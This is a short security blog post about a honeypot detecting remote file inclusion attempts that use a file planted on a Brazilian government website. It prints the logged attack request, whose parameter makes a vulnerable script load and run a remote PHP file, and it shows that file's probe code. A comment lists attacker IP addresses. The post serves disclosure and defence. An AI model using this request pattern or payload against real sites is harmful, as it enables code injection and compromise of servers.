Brazilian government site hacked

  • April 8, 2010

Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br.

We started to see RFI requests trying to use a file placed inside their “portal” directory:

a.185.231.103 - - - 
"GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"

After examining it we can see again traces of the famous RFI bot scanner:

$ lynx --source --dump http://www.sefaz.mt.gov.br/portal/tes.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Anyone with contacts on the mt.gov.br? Let them know about it.. We only detected this file, but if the attackers were able to add this one, they probably added (or will add) a bunch more.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
2 comments

  1. Hi guys,

    Confirmed through our honey net.

    RFI IP : 201.49.164.104
    RFI FQDN : 201.49.164.104
    RFI Country : – Brazil
    RFI City : N/A

    RFI ID : 4506
    RFI Domain : http://www.sefaz.mt.gov.br
    RFI Domain IP : 200.241.32.194
    RFI URL : http://www.sefaz.mt.gov.br/portal/tes.txt??

    RFI number of events : 2
    RFI total SRC IP : 1
    RFI first seen : 2010-04-08 16:58:24
    RFI last seen : 2010-04-08 17:14:38
    RFI livetime : 0 day('s)

    Source(s) requesting this RFI :

    SIP :89.185.231.103
    Numbers of events generated by this SIP : 150
    SIP first seen : 2009-07-24 03:34:41
    SIP last seen : 2010-04-08 17:14:38
    SIP also hosting RFI exploit : YES

    Events activities from this SIP : http://twitpic.com/1e3vup
    SIP as RFI details : http://twitpic.com/1e3w2x

Comments are closed.

Related Categories
You May Also Like